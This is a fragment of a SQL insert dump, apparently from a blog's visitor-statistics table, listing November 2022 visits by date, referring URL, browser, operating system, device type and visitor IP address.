(25685,'2022-11-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.87','000',0,2,0),
(25686,'2022-11-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.198','000',0,2,0),
(25687,'2022-11-16','http://ictbank.ir/blog','Firefox','Ubuntu','3.6.11','desktop','Unknown','','208.80.194.126','000',0,2,0),
(25688,'2022-11-16','http://ictbank.ir/blog','Edge','Windows','91.0.864.54','desktop','Unknown','','109.239.58.107','000',0,2,0),
(25689,'2022-11-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','45.143.223.121','000',0,2,0),
(25690,'2022-11-16','http://wikisonnati.com/blog/','Chrome','Windows','90.0.4430.85','desktop','Unknown','','5.227.29.27','000',0,7,0),
(25691,'2022-11-16','http://ictbank.ir/blog','Firefox','Windows','107.0','desktop','Unknown','','182.77.68.101','000',0,2,0),
(25692,'2022-11-16','http://ictbank.ir/blog','Firefox','Windows','3.6.7','desktop','Unknown','','208.80.194.121','000',0,2,0),
(25693,'2022-11-16','http://ictbank.ir/blog','Firefox','Windows','67.0','desktop','Unknown','','51.254.199.11','000',0,2,0),
(25694,'2022-11-16','http://ictbank.ir/blog','Chrome','Windows','34.0.1847.131','desktop','Unknown','','144.168.162.250','000',0,3,0),
(25695,'2022-11-16','http://45.92.94.221:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(25696,'2022-11-16','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.134.170','000',0,2,0),
(25697,'2022-11-16','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','198.199.125.97','000',0,1,0),
(25698,'2022-11-16','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','192.81.222.209','000',0,1,0),
(25699,'2022-11-16','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','104.238.184.130','000',0,1,0),
(25700,'2022-11-16','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.199.102','000',0,1,0),
(25701,'2022-11-17','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,3,0),
(25702,'2022-11-17','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(25703,'2022-11-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.66','000',0,2,0),
(25704,'2022-11-17','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(25705,'2022-11-17','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','134.122.110.65','000',0,2,0),
(25706,'2022-11-17','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.107','000',0,1,0),
(25707,'2022-11-17','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,4,0),
(25708,'2022-11-17','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','34.217.33.2','000',0,2,0),
(25709,'2022-11-17','https://www.google.com/','Safari','OS X','16.1','desktop','Macintosh','','95.223.69.190','000',0,1,0),
(25710,'2022-11-17','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(25711,'2022-11-17','http://ictbank.ir/blog','Chrome','Windows','70.0.3538.77','desktop','Unknown','','82.112.184.223','000',0,2,0),
(25712,'2022-11-17','http://ictbank.ir/blog','Firefox','OS X','68.0','desktop','Macintosh','','51.254.199.11','000',0,3,0),
(25713,'2022-11-17','http://ictbank.ir/blog','Chrome','Windows','85.0.4183.102','desktop','Unknown','','20.204.123.149','000',0,1,0),
(25714,'2022-11-17','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.1.248.26','000',0,2,0),
(25715,'2022-11-17','http://45.92.94.221:80/blog','Firefox','Windows','65.0','desktop','Unknown','','45.83.67.122','000',0,1,0),
(25716,'2022-11-17','http://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Galaxy S20 FE','','93.158.91.205','000',0,1,0),
(25717,'2022-11-17','https://www.google.com/','Firefox','Windows','106.0','desktop','Unknown','','186.22.19.181','000',0,1,0),
(25718,'2022-11-17','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','217.69.12.130','000',0,1,0),
(25719,'2022-11-17','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','217.69.6.75','000',0,1,0),
(25720,'2022-11-17','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','206.189.115.231','000',0,1,0),
(25721,'2022-11-17','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','46.101.23.201','000',0,1,0),
(25722,'2022-11-17','http://ictbank.ir/blog','Chrome','Windows','70.0.3538.77','desktop','Unknown','','137.184.41.47','000',0,3,0),
(25723,'2022-11-17','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(25724,'2022-11-18','http://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','47.87.225.110','000',0,2,0),
(25725,'2022-11-18','http://ictbank.ir/blog','Android Browser','Android','Unknown','tablet','Unknown','','47.92.24.158','000',0,4,0),
(25726,'2022-11-18','http://ictbank.ir/blog','Android Browser','Android','Unknown','tablet','Unknown','','121.89.208.237','000',0,4,0),
(25727,'2022-11-18','http://ictbank.ir/blog','Android Browser','Android','Unknown','tablet','Unknown','','8.142.64.24','000',0,8,0),
(25728,'2022-11-18','http://ictbank.ir/blog','Android Browser','Android','Unknown','tablet','Unknown','','8.142.158.234','000',0,4,0),
(25729,'2022-11-18','http://ictbank.ir/blog','Android Browser','Android','Unknown','tablet','Unknown','','39.103.187.166','000',0,4,0),
(25730,'2022-11-18','https://www.bing.com','Chrome','Windows','28.0.1468.0','desktop','Unknown','','103.153.68.244','000',0,1,0),
(25731,'2022-11-18','http://ictbank.ir/blog','Firefox','OS X','5.0.1','desktop','Macintosh','','208.80.194.122','000',0,2,0),
(25732,'2022-11-18','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','124.221.41.210','000',0,2,0),
(25733,'2022-11-18','http://45.92.94.221/blog','Safari','iOS','13.0.3','mobile:smart','iPhone','','223.247.178.167','000',0,2,0),
(25734,'2022-11-18','http://ictbank.ir/blog/index.php/tag/loadbalancer/','Chrome','Windows','90.0.4430.72','desktop','Unknown','','37.139.53.50','000',0,7,0),
(25735,'2022-11-18','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','162.221.192.26','000',0,4,0),
(25736,'2022-11-18','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','54.245.135.131','000',0,2,0),
(25737,'2022-11-18','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,1,0),
(25738,'2022-11-18','https://www.google.com/','Firefox','Windows','106.0','desktop','Unknown','','62.201.8.21','000',0,1,0),
(25739,'2022-11-18','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','151.236.222.179','000',0,2,0),
(25740,'2022-11-18','http://45.92.94.221:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(25741,'2022-11-18','http://www.design-arena.ir/blog','Firefox','Windows','106.0','desktop','Unknown','','51.89.228.207','000',0,2,0),
(25742,'2022-11-18','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(25743,'2022-11-18','http://ictbank.ir/blog','Firefox','Windows','100.0','desktop','Unknown','','195.181.246.191','000',0,2,0),
(25744,'2022-11-18','http://45.92.94.221/blog','Safari','iOS','13.0.3','mobile:smart','iPhone','','36.40.66.38','000',0,2,0),
(25745,'2022-11-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.56','000',0,2,0),
(25746,'2022-11-18','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','185.142.236.36','000',0,2,0),
(25747,'2022-11-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.87','000',0,2,0),
(25748,'2022-11-18','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','206.189.115.231','000',0,2,0),
(25749,'2022-11-18','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','95.179.211.0','000',0,1,0),
(25750,'2022-11-18','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','134.209.20.42','000',0,1,0),
(25751,'2022-11-18','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(25752,'2022-11-18','http://ictbank.ir/blog','Chrome','OS X','11.0.696.68','desktop','Macintosh','','208.80.194.126','000',0,1,0),
(25753,'2022-11-18','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','185.142.236.43','000',0,2,0),
(25754,'2022-11-18','http://ictbank.ir/blog','Chrome','OS X','39.0.2171.95','desktop','Macintosh','','172.173.237.71','000',0,1,0),
(25755,'2022-11-18','http://ictbank.ir/blog','Chrome','Chrome OS','29.0.1547.57','desktop','Unknown','','181.214.218.69','000',0,2,0),
(25756,'2022-11-19','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.1.248.26','000',0,3,0),
(25757,'2022-11-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.56','000',0,2,0),
(25758,'2022-11-19','http://ictbank.ir/blog','Chrome','Windows','79.0.3945.88','desktop','Unknown','','185.119.81.97','000',0,4,0),
(25759,'2022-11-19','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','193.118.53.210','000',0,2,0),
(25760,'2022-11-19','http://ns2.design-arena.ir/blog','Chrome','Windows','66.0.3359.117','desktop','Unknown','','185.180.143.147','000',0,2,0),
(25761,'2022-11-19','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(25762,'2022-11-19','http://ictbank.ir/blog','Chrome','Windows','99.0.4844.84','desktop','Unknown','','5.188.62.26','000',0,3,0),
(25763,'2022-11-19','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,3,0),
(25764,'2022-11-19','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','35.88.27.98','000',0,2,0),
(25765,'2022-11-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.16','000',0,2,0),
(25766,'2022-11-19','http://ictbank.ir/blog','Firefox','Windows','3.6.23','desktop','Unknown','','208.80.194.126','000',0,1,0),
(25767,'2022-11-19','http://ictbank.ir/blog','Chrome','Windows','85.0.4183.102','desktop','Unknown','','20.204.123.149','000',0,1,0),
(25768,'2022-11-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.197','000',0,4,0),
(25769,'2022-11-19','http://ictbank.ir/blog','Chrome','Windows','71.0.3578.98','desktop','Unknown','','93.159.230.88','000',0,1,0),
(25770,'2022-11-19','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.209.162','000',0,2,0),
(25771,'2022-11-19','http://ictbank.ir/blog','Chrome','Windows','71.0.3578.98','desktop','Unknown','','93.159.230.89','000',0,1,0),
(25772,'2022-11-19','http://45.92.94.221:80/','Chrome','Windows','99.0.4896.127','desktop','Unknown','','79.137.202.73','000',0,2,0),
(25773,'2022-11-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.87','000',0,2,0),
(25774,'2022-11-19','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','178.62.98.236','000',0,1,0),
(25775,'2022-11-19','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','45.63.115.86','000',0,1,0),
(25776,'2022-11-19','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','104.238.170.64','000',0,1,0),
(25777,'2022-11-19','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','46.101.23.201','000',0,1,0),
(25778,'2022-11-19','http://45.92.94.221/blog','Safari','iOS','13.0.3','mobile:smart','iPhone','','36.40.72.66','000',0,2,0),
(25779,'2022-11-19','http://ictbank.ir/blog','Firefox','Windows','9.0.1','desktop','Unknown','','91.32.226.87','000',0,2,0),
(25780,'2022-11-19','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(25781,'2022-11-19','http://45.92.94.221/','Chrome','OS X','17.0.963.56','desktop','Macintosh','','152.32.220.18','000',0,3,0),
(25782,'2022-11-20','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','193.118.53.210','000',0,2,0),
(25783,'2022-11-20','http://ictbank.ir/blog','Pale Moon','Windows','27.8.3','desktop','Unknown','','135.181.214.38','000',0,1,0),
(25784,'2022-11-20','http://ictbank.ir/blog','Firefox','Windows','50.0','desktop','Unknown','','95.216.155.231','000',0,1,0),
(25785,'2022-11-20','http://ictbank.ir/blog/index.php/category/database/mssql/','Chrome','Windows','90.0.4430.93','desktop','Unknown','','37.139.53.40','000',0,7,0),
(25786,'2022-11-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','20.51.225.185','000',0,9,0),
(25787,'2022-11-20','http://ictbank.ir/blog','Firefox','OS X','56.2.5','desktop','Macintosh','','65.21.178.68','000',0,1,0),
(25788,'2022-11-20','http://ictbank.ir/blog','Chrome','OS X','11.0.696.68','desktop','Macintosh','','208.80.194.122','000',0,3,0),
(25789,'2022-11-20','http://ictbank.ir/blog','SeaMonkey','Windows','2.49.3','desktop','Unknown','','135.181.141.12','000',0,1,0),
(25790,'2022-11-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.103','000',0,2,0),
(25791,'2022-11-20','http://ictbank.ir/blog','Pale Moon','Windows','27.5.1','desktop','Unknown','','198.100.144.147','000',0,1,0),
(25792,'2022-11-20','http://ictbank.ir/blog','Chrome','Windows','107.0.0.0','desktop','Unknown','','5.160.95.179','000',0,6,0),
(25793,'2022-11-20','http://ictbank.ir/blog','Chrome','Windows','107.0.0.0','desktop','Unknown','','85.133.232.202','000',0,8,0),
(25794,'2022-11-20','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.249','000',0,1,0),
(25795,'2022-11-20','http://ictbank.ir/blog','Chrome','Windows','41.0.2272.104','desktop','Unknown','','185.119.81.97','000',0,4,0),
(25796,'2022-11-20','http://45.92.94.221:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(25797,'2022-11-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.16','000',0,2,0),
(25798,'2022-11-20','http://ictbank.ir/blog','Firefox','Windows','3.6.7','desktop','Unknown','','208.80.194.121','000',0,1,0),
(25799,'2022-11-20','http://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.159.164.227','000',0,2,0),
(25800,'2022-11-20','http://ictbank.ir/blog','Chrome','OS X','53.0.2785.143','desktop','Macintosh','','60.191.125.35','000',0,1,0),
(25801,'2022-11-20','http://45.92.94.221/blog','Safari','iOS','13.0.3','mobile:smart','iPhone','','114.107.225.150','000',0,2,0),
(25802,'2022-11-20','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','104.238.184.130','000',0,1,0),
(25803,'2022-11-20','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','95.179.229.203','000',0,1,0),
(25804,'2022-11-20','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','157.245.34.123','000',0,1,0),
(25805,'2022-11-20','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','45.76.131.138','000',0,1,0),
(25806,'2022-11-20','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','195.144.21.56','000',0,2,0),
(25807,'2022-11-20','http://ictbank.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','57.128.37.136','000',0,2,0),
(25808,'2022-11-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.106','000',0,2,0),
(25809,'2022-11-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.84.150.150','000',0,2,0),
(25810,'2022-11-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,1,0),
(25811,'2022-11-21','http://ictbank.ir/blog','Chrome','Windows','85.0.4183.102','desktop','Unknown','','63.250.56.191','000',0,1,0),
(25812,'2022-11-21','http://ictbank.ir/blog','Chrome','OS X','14.0.835.202','desktop','Macintosh','','208.80.194.122','000',0,2,0),
(25813,'2022-11-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,3,0),
(25814,'2022-11-21','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','5.189.184.9','000',0,1,0),
(25815,'2022-11-21','http://ictbank.ir/blog','Chrome','Windows','96.0.4664.55','desktop','Unknown','','185.119.81.105','000',0,2,0),
(25816,'2022-11-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.84.150.150','000',0,4,0),
(25817,'2022-11-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.103','000',0,2,0),
(25818,'2022-11-21','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(25819,'2022-11-21','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(25820,'2022-11-21','http://ictbank.ir/blog','Safari','iOS','11.0','mobile:smart','iPhone','','82.145.215.206','000',0,1,0),
(25821,'2022-11-21','http://ictbank.ir/blog/','Chrome','Windows','90.0.4430.72','desktop','Unknown','','46.191.249.128','000',0,6,0),
(25822,'2022-11-21','http://design-arena.ir','Chrome','Windows','78.0.3904.97','desktop','Unknown','','185.220.101.12','000',0,2,0),
(25823,'2022-11-21','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,2,0),
(25824,'2022-11-21','http://www.wikisonnati.com/blog','Firefox','Windows','106.0','desktop','Unknown','','137.74.27.104','000',0,2,0),
(25825,'2022-11-21','http://45.92.94.221/blog','Safari','iOS','13.0.3','mobile:smart','iPhone','','113.142.141.105','000',0,2,0),
(25826,'2022-11-21','http://ictbank.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','57.128.37.136','000',0,2,0),
(25827,'2022-11-21','https://www.google.com/','Chrome','Windows','107.0.0.0','desktop','Unknown','','81.99.25.150','000',0,1,0),
(25828,'2022-11-21','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','188.166.159.169','000',0,1,0),
(25829,'2022-11-21','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','95.179.217.107','000',0,1,0),
(25830,'2022-11-21','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','178.128.165.136','000',0,1,0),
(25831,'2022-11-21','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','157.245.34.123','000',0,1,0),
(25832,'2022-11-21','http://45.92.94.221/blog/sitemap.xml','Chrome','OS X','54.0.585','desktop','Macintosh','','106.75.5.104','000',0,6,0),
(25833,'2022-11-22','http://ictbank.ir/blog','Edge','Windows','91.0.864.54','desktop','Unknown','','185.181.60.39','000',0,2,0),
(25834,'2022-11-22','http://ictbank.ir/blog','Edge','Windows','91.0.864.54','desktop','Unknown','','185.181.60.189','000',0,1,0),
(25835,'2022-11-22','http://ictbank.ir/blog','Chrome','Windows','70.0.3538.102','desktop','Unknown','','185.119.81.105','000',0,8,0),
(25836,'2022-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0.648.151','desktop','Unknown','','208.80.194.121','000',0,1,0),
(25837,'2022-11-22','http://ictbank.ir/blog','Chrome','Windows','72.0.3626.109','desktop','Unknown','','193.233.49.19','000',0,3,0),
(25838,'2022-11-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.57','000',0,6,0),
(25839,'2022-11-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,3,0),
(25840,'2022-11-22','http://ictbank.ir/blog','Chrome','OS X','14.0.835.202','desktop','Macintosh','','208.80.194.126','000',0,2,0),
(25841,'2022-11-22','http://ictbank.ir/blog','Safari','Windows','5.0.4','desktop','Unknown','','34.205.55.52','000',0,1,0),
(25842,'2022-11-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.56','000',0,2,0),
(25843,'2022-11-22','http://ictbank.ir/blog','Chrome','Windows','107.0.0.0','desktop','Unknown','','89.187.163.166','000',0,4,0),
(25844,'2022-11-22','http://45.92.94.221:80/','Chrome','Windows','99.0.4896.127','desktop','Unknown','','79.137.202.73','000',0,2,0),
(25845,'2022-11-22','http://ictbank.ir/blog/category/os/','Chrome','Windows','107.0.0.0','desktop','Unknown','','156.146.59.2','000',0,4,0),
(25846,'2022-11-22','http://ictbank.ir/blog','Chrome','Windows','107.0.0.0','desktop','Unknown','','85.133.232.202','000',0,3,0),
(25847,'2022-11-22','http://ictbank.ir/blog','Firefox','Windows','40.0','desktop','Unknown','','76.72.172.169','000',0,2,0),
(25848,'2022-11-22','https://www.google.com/','Chrome','Windows','107.0.0.0','desktop','Unknown','','80.255.90.166','000',0,2,0),
(25849,'2022-11-22','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,2,0),
(25850,'2022-11-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.84.150.150','000',0,1,0),
(25851,'2022-11-22','http://ictbank.ir/blog','Chrome','Linux','107.0.0.0','desktop','Unknown','','78.109.139.161','000',0,1,0),
(25852,'2022-11-22','http://45.92.94.221/blog','Safari','iOS','13.0.3','mobile:smart','iPhone','','59.36.163.204','000',0,2,0),
(25853,'2022-11-22','https://www.google.com/','Safari','OS X','16.1','desktop','Macintosh','','94.143.189.242','000',0,1,0),
(25854,'2022-11-22','http://ictbank.ir/blog','Firefox','Windows','4.0.1','desktop','Unknown','','208.80.194.122','000',0,1,0),
(25855,'2022-11-22','http://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Chrome','Windows','90.0.4430.72','desktop','Unknown','','158.69.119.16','000',0,2,0),
(25856,'2022-11-22','http://45.92.94.221:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(25857,'2022-11-22','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','23.251.102.74','000',0,2,0),
(25858,'2022-11-22','http://45.92.94.221:80/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','34.236.170.183','000',0,1,0),
(25859,'2022-11-22','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','46.101.23.201','000',0,2,0),
(25860,'2022-11-22','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','95.179.239.244','000',0,1,0),
(25861,'2022-11-22','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.244.3','000',0,1,0),
(25862,'2022-11-22','https://www.google.com/','Chrome','Windows','107.0.0.0','desktop','Unknown','','200.108.130.98','000',0,1,0),
(25863,'2022-11-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.87','000',0,2,0),
(25864,'2022-11-22','http://ictbank.ir/blog/index.php/tag/rpm/','Chrome','Windows','90.0.4430.72','desktop','Unknown','','37.139.53.40','000',0,7,0),
(25865,'2022-11-22','http://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','159.203.125.30','000',0,2,0),
(25866,'2022-11-22','http://design-arena.ir/blog','Firefox','Windows','104.0','desktop','Unknown','','130.255.166.97','000',0,1,0),
(25867,'2022-11-22','http://design-arena.ir/blog/','Firefox','Windows','104.0','desktop','Unknown','','130.255.166.11','000',0,1,0),
(25868,'2022-11-22','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(25869,'2022-11-23','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,18,0),
(25870,'2022-11-23','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(25871,'2022-11-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.87','000',0,2,0),
(25872,'2022-11-23','http://ictbank.ir/blog','Chrome','Windows','80.0.3987.106','desktop','Unknown','','185.119.81.105','000',0,2,0),
(25873,'2022-11-23','http://ictbank.ir/blog','Chrome','Windows','107.0.0.0','desktop','Unknown','','156.146.59.2','000',0,5,0),
(25874,'2022-11-23','http://ictbank.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','57.128.37.136','000',0,5,0),
(25875,'2022-11-23','http://ictbank.ir/blog','Chrome','Windows','107.0.0.0','desktop','Unknown','','5.160.95.179','000',0,2,0),
(25876,'2022-11-23','http://45.92.94.221:80/','Chrome','Windows','99.0.0.0','desktop','Unknown','','79.137.202.73','000',0,4,0),
(25877,'2022-11-23','http://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','5.188.62.140','000',0,2,0),
(25878,'2022-11-23','https://www.google.com/','Chrome','Linux','107.0.0.0','desktop','Unknown','','62.89.2.218','000',0,1,0),
(25879,'2022-11-23','http://ictbank.ir/blog','Chrome','Android','107.0.0.0','mobile:smart','7 Pro','','93.180.188.98','000',0,2,0),
(25880,'2022-11-23','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','198.96.155.3','000',0,1,0),
(25881,'2022-11-23','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.101.35','000',0,1,0),
(25882,'2022-11-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.57','000',0,2,0),
(25883,'2022-11-23','https://www.google.com/','Chrome','Windows','107.0.0.0','desktop','Unknown','','182.59.57.228','000',0,1,0),
(25884,'2022-11-23','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(25885,'2022-11-23','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','162.221.192.26','000',0,2,0),
(25886,'2022-11-23','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,6,0),
(25887,'2022-11-23','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','114.107.225.150','000',0,2,0),
(25888,'2022-11-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.84.150.150','000',0,4,0),
(25889,'2022-11-23','https://www.google.com/','Chrome','Windows','107.0.0.0','desktop','Unknown','','134.35.32.115','000',0,1,0),
(25890,'2022-11-23','http://wikisonnati.com/blog','Safari','iOS','15.0','mobile:smart','iPhone','','192.71.44.44','000',0,1,0),
(25891,'2022-11-23','http://wikisonnati.com/blog/','Safari','iOS','15.0','mobile:smart','iPhone','','192.71.103.173','000',0,1,0),
(25892,'2022-11-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.31','000',0,4,0),
(25893,'2022-11-23','https://www.google.com/','Chrome','Android','106.0.0.0','mobile:smart','Reno 6','','49.205.241.71','000',0,1,0),
(25894,'2022-11-23','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.173','000',0,1,0),
(25895,'2022-11-23','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','188.166.159.169','000',0,1,0),
(25896,'2022-11-23','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','185.14.184.197','000',0,1,0),
(25897,'2022-11-23','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','159.65.21.153','000',0,1,0),
(25898,'2022-11-23','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','104.238.170.64','000',0,1,0),
(25899,'2022-11-23','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','51.254.59.113','000',0,1,0),
(25900,'2022-11-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.233','000',0,2,0),
(25901,'2022-11-23','http://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','88.99.136.18','000',0,3,0),
(25902,'2022-11-24','http://ictbank.ir/blog/index.php/category/os/linxu/oraclelinux/','Edge','Windows','90.0.0.0','desktop','Unknown','','37.139.53.50','000',0,7,0),
